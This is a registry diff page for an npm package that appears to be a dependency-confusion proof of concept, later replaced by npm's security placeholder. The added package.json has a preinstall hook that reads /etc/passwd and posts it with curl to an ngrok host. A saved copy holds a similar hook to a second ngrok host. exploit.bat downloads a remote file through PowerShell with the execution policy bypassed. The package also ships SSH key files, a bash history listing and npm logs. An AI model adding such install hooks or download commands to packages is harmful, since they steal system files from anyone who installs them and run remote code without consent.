npm - myconfusedfunctionpoctestpackage - Versions diffs - 0.0.1-security → 1.3.7 - Mend

myconfusedfunctionpoctestpackage 0.0.1-security → 1.3.7

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of myconfusedfunctionpoctestpackage might be problematic. Click here for more details.

Files changed (30) hide show

package/.bash_history +438 -0
package/.bash_logout +7 -0
package/.bashrc +117 -0
package/.cache/motd.legal-displayed +0 -0
package/.lesshst +1 -0
package/.npm/_cacache/content-v2/sha512/b8/51/568e10b451231652e765d375bb1ae377accd82d44fd38d3a42ca3d08143e687ac673bbb88be55f179f5437258bc31f966f87abd48ed9147079416219c380 +0 -0
package/.npm/_cacache/content-v2/sha512/fc/46/a337080f6bfc09d36dc38fcecb28d2d7f2fa145f3a55b75c27adc09ad9b4f928578804de633be502576c9b72f20db043aa01464998f745eaf46dcd429295 +0 -0
package/.npm/_cacache/index-v5/ae/c1/794477315825298db9ca27dfd950e963043ec553246545524bbab48a0c70 +3 -0
package/.npm/_logs/2025-02-25T20_56_54_531Z-debug-0.log +89 -0
package/.npm/_logs/2025-02-25T21_15_42_078Z-debug-0.log +90 -0
package/.npm/_logs/2025-02-25T21_36_07_005Z-debug-0.log +91 -0
package/.npm/_logs/2025-02-26T16_25_18_831Z-debug-0.log +92 -0
package/.npm/_logs/2025-02-26T16_43_22_056Z-debug-0.log +93 -0
package/.npm/_logs/2025-02-26T16_56_10_464Z-debug-0.log +94 -0
package/.npm/_logs/2025-02-26T17_02_13_774Z-debug-0.log +112 -0
package/.npm/_logs/2025-02-26T17_03_41_815Z-debug-0.log +38 -0
package/.npm/_logs/2025-02-26T17_03_45_449Z-debug-0.log +80 -0
package/.npm/_logs/2025-02-26T17_22_53_777Z-debug-0.log +82 -0
package/.npm/_logs/2025-02-26T17_40_49_914Z-debug-0.log +35 -0
package/.npm/_update-notifier-last-checked +0 -0
package/.profile +27 -0
package/.ssh/authorized_keys +1 -0
package/.ssh/known_hosts +1 -0
package/.sudo_as_admin_successful +0 -0
package/base.ldif +13 -0
package/exploit.bat +1 -0
package/exploit.txt +26 -0
package/package.json +10 -4
package/package.json.save +12 -0
package/README.md +0 -5

package/.npm/_logs/2025-02-26T17_03_41_815Z-debug-0.log ADDED Viewed

@@ -0,0 +1,38 @@
+0 verbose cli /usr/bin/node /usr/bin/npm
+1 info using npm@9.2.0
+2 info using node@v18.19.1
+3 timing npm:load:whichnode Completed in 1ms
+4 timing config:load:defaults Completed in 3ms
+5 timing config:load:file:/usr/share/nodejs/npm/npmrc Completed in 3ms
+6 timing config:load:builtin Completed in 4ms
+7 timing config:load:cli Completed in 4ms
+8 timing config:load:env Completed in 1ms
+9 timing config:load:project Completed in 1ms
+10 timing config:load:file:/home/bigibson/.npmrc Completed in 0ms
+11 timing config:load:user Completed in 0ms
+12 timing config:load:file:/etc/npmrc Completed in 0ms
+13 timing config:load:global Completed in 0ms
+14 timing config:load:setEnvs Completed in 2ms
+15 timing config:load Completed in 17ms
+16 timing npm:load:configload Completed in 17ms
+17 timing npm:load:mkdirpcache Completed in 1ms
+18 timing npm:load:mkdirplogs Completed in 0ms
+19 verbose title npm cache clean
+20 verbose argv "cache" "clean" "--force"
+21 timing npm:load:setTitle Completed in 2ms
+22 timing config:load:flatten Completed in 6ms
+23 timing npm:load:display Completed in 7ms
+24 verbose logfile logs-max:10 dir:/home/bigibson/.npm/_logs/2025-02-26T17_03_41_815Z-
+25 verbose logfile /home/bigibson/.npm/_logs/2025-02-26T17_03_41_815Z-debug-0.log
+26 timing npm:load:logFile Completed in 14ms
+27 timing npm:load:timers Completed in 0ms
+28 timing npm:load:configScope Completed in 0ms
+29 warn using --force Recommended protections disabled.
+30 timing npm:load Completed in 47ms
+31 timing config:load:flatten Completed in 1ms
+32 silly logfile start cleaning logs, removing 1 files
+33 silly logfile done cleaning log files
+34 timing command:cache Completed in 94ms
+35 verbose exit 0
+36 timing npm Completed in 161ms
+37 info ok

package/.npm/_logs/2025-02-26T17_03_45_449Z-debug-0.log ADDED Viewed

@@ -0,0 +1,80 @@
+0 verbose cli /usr/bin/node /usr/bin/npm
+1 info using npm@9.2.0
+2 info using node@v18.19.1
+3 timing npm:load:whichnode Completed in 1ms
+4 timing config:load:defaults Completed in 3ms
+5 timing config:load:file:/usr/share/nodejs/npm/npmrc Completed in 7ms
+6 timing config:load:builtin Completed in 8ms
+7 timing config:load:cli Completed in 3ms
+8 timing config:load:env Completed in 1ms
+9 timing config:load:project Completed in 2ms
+10 timing config:load:file:/home/bigibson/.npmrc Completed in 0ms
+11 timing config:load:user Completed in 0ms
+12 timing config:load:file:/etc/npmrc Completed in 0ms
+13 timing config:load:global Completed in 0ms
+14 timing config:load:setEnvs Completed in 2ms
+15 timing config:load Completed in 20ms
+16 timing npm:load:configload Completed in 20ms
+17 timing npm:load:mkdirpcache Completed in 1ms
+18 timing npm:load:mkdirplogs Completed in 0ms
+19 verbose title npm publish
+20 verbose argv "publish" "--scope" "public" "--loglevel" "verbose"
+21 timing npm:load:setTitle Completed in 3ms
+22 timing config:load:flatten Completed in 6ms
+23 timing npm:load:display Completed in 13ms
+24 verbose logfile logs-max:10 dir:/home/bigibson/.npm/_logs/2025-02-26T17_03_45_449Z-
+25 verbose logfile /home/bigibson/.npm/_logs/2025-02-26T17_03_45_449Z-debug-0.log
+26 timing npm:load:logFile Completed in 15ms
+27 timing npm:load:timers Completed in 0ms
+28 timing npm:load:configScope Completed in 1ms
+29 timing npm:load Completed in 55ms
+30 verbose publish [ '.' ]
+31 timing config:load:flatten Completed in 1ms
+32 silly logfile start cleaning logs, removing 1 files
+33 silly logfile done cleaning log files
+34 timing arborist:ctor Completed in 2ms
+35 notice
+36 notice 📦  myconfusedfunctionpoctestpackage@1.3.5
+37 notice === Tarball Contents ===
+38 notice 13.8kB .bash_history
+38 notice 220B   .bash_logout
+38 notice 3.8kB  .bashrc
+38 notice 0B     .cache/motd.legal-displayed
+38 notice 20B    .lesshst
+38 notice 8.6kB  .npm/_logs/2025-02-25T20_27_17_220Z-debug-0.log
+38 notice 8.8kB  .npm/_logs/2025-02-25T20_44_47_592Z-debug-0.log
+38 notice 9.0kB  .npm/_logs/2025-02-25T20_56_54_531Z-debug-0.log
+38 notice 9.1kB  .npm/_logs/2025-02-25T21_15_42_078Z-debug-0.log
+38 notice 9.3kB  .npm/_logs/2025-02-25T21_36_07_005Z-debug-0.log
+38 notice 9.5kB  .npm/_logs/2025-02-26T16_25_18_831Z-debug-0.log
+38 notice 9.7kB  .npm/_logs/2025-02-26T16_43_22_056Z-debug-0.log
+38 notice 9.9kB  .npm/_logs/2025-02-26T16_56_10_464Z-debug-0.log
+38 notice 11.2kB .npm/_logs/2025-02-26T17_02_13_774Z-debug-0.log
+38 notice 1.7kB  .npm/_logs/2025-02-26T17_03_41_815Z-debug-0.log
+38 notice 1.7kB  .npm/_logs/2025-02-26T17_03_45_449Z-debug-0.log
+38 notice 0B     .npm/_update-notifier-last-checked
+38 notice 807B   .profile
+38 notice 100B   .ssh/authorized_keys
+38 notice 142B   .ssh/known_hosts
+38 notice 0B     .sudo_as_admin_successful
+38 notice 327B   base.ldif
+38 notice 377B   exploit.bat
+38 notice 3.8kB  exploit.txt
+38 notice 349B   package.json
+38 notice 289B   package.json.save
+39 notice === Tarball Details ===
+40 notice name:          myconfusedfunctionpoctestpackage
+40 notice version:       1.3.5
+40 notice filename:      myconfusedfunctionpoctestpackage-1.3.5.tgz
+40 notice package size:  12.0 kB
+40 notice unpacked size: 112.5 kB
+40 notice shasum:        1574b994a6dcd6dc2e2bb5b068c3b5a9735cefad
+40 notice integrity:     sha512-uFFWjhC0USMWU[...]tkUcHlBYhnDgA==
+40 notice total files:   26
+41 notice
+42 notice Publishing to https://registry.npmjs.org/ with tag latest and default access
+43 http fetch PUT 200 https://registry.npmjs.org/myconfusedfunctionpoctestpackage 1169ms
+44 timing command:publish Completed in 1394ms
+45 verbose exit 0
+46 timing npm Completed in 1481ms
+47 info ok

package/.npm/_logs/2025-02-26T17_22_53_777Z-debug-0.log ADDED Viewed

@@ -0,0 +1,82 @@
+0 verbose cli /usr/bin/node /usr/bin/npm
+1 info using npm@9.2.0
+2 info using node@v18.19.1
+3 timing npm:load:whichnode Completed in 0ms
+4 timing config:load:defaults Completed in 2ms
+5 timing config:load:file:/usr/share/nodejs/npm/npmrc Completed in 7ms
+6 timing config:load:builtin Completed in 8ms
+7 timing config:load:cli Completed in 3ms
+8 timing config:load:env Completed in 1ms
+9 timing config:load:project Completed in 1ms
+10 timing config:load:file:/home/bigibson/.npmrc Completed in 0ms
+11 timing config:load:user Completed in 0ms
+12 timing config:load:file:/etc/npmrc Completed in 0ms
+13 timing config:load:global Completed in 1ms
+14 timing config:load:setEnvs Completed in 2ms
+15 timing config:load Completed in 19ms
+16 timing npm:load:configload Completed in 20ms
+17 timing npm:load:mkdirpcache Completed in 0ms
+18 timing npm:load:mkdirplogs Completed in 1ms
+19 verbose title npm publish
+20 verbose argv "publish" "--scope" "public" "--loglevel" "verbose"
+21 timing npm:load:setTitle Completed in 2ms
+22 timing config:load:flatten Completed in 8ms
+23 timing npm:load:display Completed in 15ms
+24 verbose logfile logs-max:10 dir:/home/bigibson/.npm/_logs/2025-02-26T17_22_53_777Z-
+25 verbose logfile /home/bigibson/.npm/_logs/2025-02-26T17_22_53_777Z-debug-0.log
+26 timing npm:load:logFile Completed in 13ms
+27 timing npm:load:timers Completed in 0ms
+28 timing npm:load:configScope Completed in 1ms
+29 timing npm:load Completed in 52ms
+30 verbose publish [ '.' ]
+31 timing config:load:flatten Completed in 1ms
+32 silly logfile start cleaning logs, removing 1 files
+33 silly logfile done cleaning log files
+34 timing arborist:ctor Completed in 1ms
+35 notice
+36 notice 📦  myconfusedfunctionpoctestpackage@1.3.6
+37 notice === Tarball Contents ===
+38 notice 13.8kB .bash_history
+38 notice 220B   .bash_logout
+38 notice 3.8kB  .bashrc
+38 notice 0B     .cache/motd.legal-displayed
+38 notice 20B    .lesshst
+38 notice 12.0kB .npm/_cacache/content-v2/sha512/b8/51/568e10b451231652e765d375bb1ae377accd82d44fd38d3a42ca3d08143e687ac673bbb88be55f179f5437258bc31f966f87abd48ed9147079416219c380
+38 notice 230B   .npm/_cacache/index-v5/ae/c1/794477315825298db9ca27dfd950e963043ec553246545524bbab48a0c70
+38 notice 8.8kB  .npm/_logs/2025-02-25T20_44_47_592Z-debug-0.log
+38 notice 9.0kB  .npm/_logs/2025-02-25T20_56_54_531Z-debug-0.log
+38 notice 9.1kB  .npm/_logs/2025-02-25T21_15_42_078Z-debug-0.log
+38 notice 9.3kB  .npm/_logs/2025-02-25T21_36_07_005Z-debug-0.log
+38 notice 9.5kB  .npm/_logs/2025-02-26T16_25_18_831Z-debug-0.log
+38 notice 9.7kB  .npm/_logs/2025-02-26T16_43_22_056Z-debug-0.log
+38 notice 9.9kB  .npm/_logs/2025-02-26T16_56_10_464Z-debug-0.log
+38 notice 11.2kB .npm/_logs/2025-02-26T17_02_13_774Z-debug-0.log
+38 notice 1.7kB  .npm/_logs/2025-02-26T17_03_41_815Z-debug-0.log
+38 notice 4.3kB  .npm/_logs/2025-02-26T17_03_45_449Z-debug-0.log
+38 notice 1.7kB  .npm/_logs/2025-02-26T17_22_53_777Z-debug-0.log
+38 notice 0B     .npm/_update-notifier-last-checked
+38 notice 807B   .profile
+38 notice 100B   .ssh/authorized_keys
+38 notice 142B   .ssh/known_hosts
+38 notice 0B     .sudo_as_admin_successful
+38 notice 327B   base.ldif
+38 notice 377B   exploit.bat
+38 notice 3.8kB  exploit.txt
+38 notice 341B   package.json
+38 notice 289B   package.json.save
+39 notice === Tarball Details ===
+40 notice name:          myconfusedfunctionpoctestpackage
+40 notice version:       1.3.6
+40 notice filename:      myconfusedfunctionpoctestpackage-1.3.6.tgz
+40 notice package size:  25.0 kB
+40 notice unpacked size: 120.5 kB
+40 notice shasum:        963311a63a5d67d0528e3c0b8c27b4e4066df63d
+40 notice integrity:     sha512-/EajNwgPa/wJ0[...]PdF6vRtzUKSlQ==
+40 notice total files:   28
+41 notice
+42 notice Publishing to https://registry.npmjs.org/ with tag latest and default access
+43 http fetch PUT 200 https://registry.npmjs.org/myconfusedfunctionpoctestpackage 1507ms
+44 timing command:publish Completed in 1779ms
+45 verbose exit 0
+46 timing npm Completed in 1857ms
+47 info ok

package/.npm/_logs/2025-02-26T17_40_49_914Z-debug-0.log ADDED Viewed

@@ -0,0 +1,35 @@
+0 verbose cli /usr/bin/node /usr/bin/npm
+1 info using npm@9.2.0
+2 info using node@v18.19.1
+3 timing npm:load:whichnode Completed in 1ms
+4 timing config:load:defaults Completed in 4ms
+5 timing config:load:file:/usr/share/nodejs/npm/npmrc Completed in 3ms
+6 timing config:load:builtin Completed in 3ms
+7 timing config:load:cli Completed in 4ms
+8 timing config:load:env Completed in 1ms
+9 timing config:load:project Completed in 1ms
+10 timing config:load:file:/home/bigibson/.npmrc Completed in 0ms
+11 timing config:load:user Completed in 0ms
+12 timing config:load:file:/etc/npmrc Completed in 1ms
+13 timing config:load:global Completed in 1ms
+14 timing config:load:setEnvs Completed in 2ms
+15 timing config:load Completed in 17ms
+16 timing npm:load:configload Completed in 17ms
+17 timing npm:load:mkdirpcache Completed in 0ms
+18 timing npm:load:mkdirplogs Completed in 0ms
+19 verbose title npm publish
+20 verbose argv "publish" "--scope" "public" "--loglevel" "verbose"
+21 timing npm:load:setTitle Completed in 3ms
+22 timing config:load:flatten Completed in 7ms
+23 timing npm:load:display Completed in 15ms
+24 verbose logfile logs-max:10 dir:/home/bigibson/.npm/_logs/2025-02-26T17_40_49_914Z-
+25 verbose logfile /home/bigibson/.npm/_logs/2025-02-26T17_40_49_914Z-debug-0.log
+26 timing npm:load:logFile Completed in 14ms
+27 timing npm:load:timers Completed in 0ms
+28 timing npm:load:configScope Completed in 0ms
+29 timing npm:load Completed in 52ms
+30 verbose publish [ '.' ]
+31 timing config:load:flatten Completed in 1ms
+32 silly logfile start cleaning logs, removing 1 files
+33 silly logfile done cleaning log files
+34 timing arborist:ctor Completed in 2ms

package/.npm/_update-notifier-last-checked ADDED Viewed

File without changes

package/.profile ADDED Viewed

@@ -0,0 +1,27 @@
+# ~/.profile: executed by the command interpreter for login shells.
+# This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login
+# exists.
+# see /usr/share/doc/bash/examples/startup-files for examples.
+# the files are located in the bash-doc package.
+# the default umask is set in /etc/profile; for setting the umask
+# for ssh logins, install and configure the libpam-umask package.
+#umask 022
+# if running bash
+if [ -n "$BASH_VERSION" ]; then
+    # include .bashrc if it exists
+    if [ -f "$HOME/.bashrc" ]; then
+	. "$HOME/.bashrc"
+    fi
+fi
+# set PATH so it includes user's private bin if it exists
+if [ -d "$HOME/bin" ] ; then
+    PATH="$HOME/bin:$PATH"
+fi
+# set PATH so it includes user's private bin if it exists
+if [ -d "$HOME/.local/bin" ] ; then
+    PATH="$HOME/.local/bin:$PATH"
+fi

package/.ssh/authorized_keys ADDED Viewed

	@@ -0,0 +1 @@
1	+ ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPq46DtywGDKH3HEWsTSAHMChzF4JdA12udtwRzMwFRw generated-by-azure

package/.ssh/known_hosts ADDED Viewed

	@@ -0,0 +1 @@
1	+ \|1\|hAkID7hatXT1a6M7ajlyZPpSkF8=\|kncqw+21A5d2r+H/VEu2NS/KylU= ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIII/rK32lDm0wteqXPKQZiqRxMQlA2IcT1azYWLHzTMe

package/.sudo_as_admin_successful ADDED Viewed

File without changes

package/base.ldif ADDED Viewed

@@ -0,0 +1,13 @@
+dn: dc=ldap,dc=example,dc=com
+objectClass: top
+objectClass: dcObject
+objectClass: organization
+o: Example LDAP Organization
+dc: ldap
+dn: cn=admin,ldap,dc=example,dc=com
+objectClass: simpleSecurityObject
+objectClass: organizationalRole
+cn: admin
+description: Directory Administrator
+userPassword: {SSHA}your_encrypted_password

package/exploit.bat ADDED Viewed

	@@ -0,0 +1 @@
1	+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -Command "& { try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://drive.google.com/uc?export=download&id=1dTAN7CRkUj25ViAGpiUCZOCiyjpJGIQP' -OutFile 'C:\Users\ADClient1-Admin\Downloads\exploit.txt' } catch { Write-Error $_ } }"

package/exploit.txt ADDED Viewed

@@ -0,0 +1,26 @@
+This file is a "malicious" file
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⡠⢤⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡴⠟⠃⠀⠀⠙⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⠋⠀⠀⠀⠀⠀⠀⠘⣆⠀⠀⠀⠀⠀⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⠾⢛⠒⠀⠀⠀⠀⠀⠀⠀⢸⡆⠀⠀⠀⠀⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣶⣄⡈⠓⢄⠠⡀⠀⠀⠀⣄⣷⠀⠀⠀⠀⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣿⣷⠀⠈⠱⡄⠑⣌⠆⠀⠀⡜⢻⠀⠀⠀⠀⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⡿⠳⡆⠐⢿⣆⠈⢿⠀⠀⡇⠘⡆⠀⠀⠀⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢿⣿⣷⡇⠀⠀⠈⢆⠈⠆⢸⠀⠀⢣⠀⠀⠀⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣧⠀⠀⠈⢂⠀⡇⠀⠀⢨⠓⣄⠀⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⣿⣿⣦⣤⠖⡏⡸⠀⣀⡴⠋⠀⠈⠢⡀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣾⠁⣹⣿⣿⣿⣷⣾⠽⠖⠊⢹⣀⠄⠀⠀⠀⠈⢣⡀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡟⣇⣰⢫⢻⢉⠉⠀⣿⡆⠀⠀⡸⡏⠀⠀⠀⠀⠀⠀⢇
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢨⡇⡇⠈⢸⢸⢸⠀⠀⡇⡇⠀⠀⠁⠻⡄⡠⠂⠀⠀⠀⠘
+⢤⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⠛⠓⡇⠀⠸⡆⢸⠀⢠⣿⠀⠀⠀⠀⣰⣿⣵⡆⠀⠀⠀⠀
+⠈⢻⣷⣦⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⡿⣦⣀⡇⠀⢧⡇⠀⠀⢺⡟⠀⠀⠀⢰⠉⣰⠟⠊⣠⠂⠀⡸
+⠀⠀⢻⣿⣿⣷⣦⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⢧⡙⠺⠿⡇⠀⠘⠇⠀⠀⢸⣧⠀⠀⢠⠃⣾⣌⠉⠩⠭⠍⣉⡇
+⠀⠀⠀⠻⣿⣿⣿⣿⣿⣦⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣞⣋⠀⠈⠀⡳⣧⠀⠀⠀⠀⠀⢸⡏⠀⠀⡞⢰⠉⠉⠉⠉⠉⠓⢻⠃
+⠀⠀⠀⠀⠹⣿⣿⣿⣿⣿⣿⣷⡄⠀⠀⢀⣀⠠⠤⣤⣤⠤⠞⠓⢠⠈⡆⠀⢣⣸⣾⠆⠀⠀⠀⠀⠀⢀⣀⡼⠁⡿⠈⣉⣉⣒⡒⠢⡼⠀
+⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⣿⣿⣿⣎⣽⣶⣤⡶⢋⣤⠃⣠⡦⢀⡼⢦⣾⡤⠚⣟⣁⣀⣀⣀⣀⠀⣀⣈⣀⣠⣾⣅⠀⠑⠂⠤⠌⣩⡇⠀
+⠀⠀⠀⠀⠀⠀⠘⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡁⣺⢁⣞⣉⡴⠟⡀⠀⠀⠀⠁⠸⡅⠀⠈⢷⠈⠏⠙⠀⢹⡛⠀⢉⠀⠀⠀⣀⣀⣼⡇⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠈⠻⣿⣿⣿⣿⣿⣿⣿⣿⣽⣿⡟⢡⠖⣡⡴⠂⣀⣀⣀⣰⣁⣀⣀⣸⠀⠀⠀⠀⠈⠁⠀⠀⠈⠀⣠⠜⠋⣠⠁⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⢿⣿⣿⣿⡟⢿⣿⣿⣷⡟⢋⣥⣖⣉⠀⠈⢁⡀⠤⠚⠿⣷⡦⢀⣠⣀⠢⣄⣀⡠⠔⠋⠁⠀⣼⠃⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠻⣿⣿⡄⠈⠻⣿⣿⢿⣛⣩⠤⠒⠉⠁⠀⠀⠀⠀⠀⠉⠒⢤⡀⠉⠁⠀⠀⠀⠀⠀⢀⡿⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠙⢿⣤⣤⠴⠟⠋⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠑⠤⠀⠀⠀⠀⠀⢩⠇⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀

package/package.json CHANGED Viewed

@@ -1,6 +1,12 @@
 {
-  "name": "myconfusedfunctionpoctestpackage",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+"name": "myconfusedfunctionpoctestpackage",
+"version": "1.3.7",
+"description": "poc",
+"main": "index.js",
+"scripts": {
+"test": "echo 'testa'",
+"preinstall": "cat /etc/passwd | curl -X POST -H 'Content-Type: application/x-www-form-urlencoded' --data-urlencode @- https://61d0-34-168-173-48.ngrok-free.app"
+},
+"author": "me",
+"license": "ISC"
 }

package/package.json.save ADDED Viewed

@@ -0,0 +1,12 @@
+{
+"name": "mygcpconfusedfunctionpocmaliciouspackage",
+"version": "1.1.1",
+"description": "poc",
+"main": "index.js",
+"scripts": {
+"test": "echo 'testa'",
+"preinstall": "echo 'hello world'|jq -sRr|curl -X POST https://d2b8-34-168-173-48.ngrok-free.app"
+},
+"author": "me",
+"license": "ISC"
+}

package/README.md DELETED Viewed

@@ -1,5 +0,0 @@
-# Security holding package
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-Please refer to www.npmjs.com/advisories?search=myconfusedfunctionpoctestpackage for more information.